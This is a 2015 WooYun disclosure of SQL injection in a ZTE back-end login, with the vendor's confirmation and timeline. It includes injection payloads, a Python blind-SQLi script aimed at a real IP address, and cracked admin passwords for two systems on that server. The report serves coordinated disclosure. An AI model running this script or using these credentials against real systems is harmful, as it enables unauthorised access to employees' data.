当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149166

漏洞标题:中兴某后台SQL注入(附验证脚本)

相关厂商:中兴通讯股份有限公司

漏洞作者: hecate

提交时间:2015-10-25 22:09

修复时间:2015-12-10 11:56

公开时间:2015-12-10 11:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-25: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

中兴某后台SQL注入(附验证脚本)

详细说明:

1.泛微的系统 http://58.213.14.165:89存在SQL注入
①当输入一个不存在的用户名时返回103
提示 Error: User Not Found (103)

11.png


②当输入存在的用户名时返回102
提示 Error: login password is incorrect (102)

22.png


用户名输入sysadmin'and'1'='1时 返回102

33.png


POST数据返回102

loginid=sysadmin' and length(password)=32 and'1'='1&password=a&authcode=&dynapass=&tokenpass=&clienttype=Webclient&clientver=5.5&language=&country=&verify=&needdyna=


得到密文长度为32位
然后写个脚本猜具体数据

import urllib
import urllib2
dic='0123456789ABCDEF'
pwd=''
for i in range(32):
for j in dic:
username="sysadmin' and(substr(password,"+str(i+1)+",1)='"+j+"') and 'a'='a"
values={'loginid':username,'password':'a','authcode':'','dynapass':'','tokenpass':'',
'clienttype':'webclient','clientver':5.5,'language':'','country':'','verify':'','needdyna':''}
data=urllib.urlencode(values)
req=urllib2.Request("http://58.213.14.165:89/verifyLogin.do",data)
response=urllib2.urlopen(req)
html=response.read()
fd=html.count('102')
if fd>0:
pwd=pwd+j
print pwd
break


44.png


即结果为 61F7886E17BDB3DA71A752AD88CB69D7
解密后为 ztesc123
尝试登录之,结果

55.png


2.目测是个烂系统,但是发现同服务器上存在另一个泛微系统
http://58.213.14.165:8088/login
尝试使用以上用户名登录不成功,看下密码格式,简直就是弱口令啊
继续尝试使用

sysadmin 密码zte123

登录成功

66.png


是个微信后台,200个员工信息

77.png

漏洞证明:

如上

修复方案:

可以删了

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-26 11:54

厂商回复:

感谢提交~

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-26 13:33 | hecate ( 普通白帽子 | Rank:569 漏洞数:89 | ®高级安全工程师 | WooYun认证√)

    @中兴通讯股份有限公司 有礼物吗,人家华为就会发礼物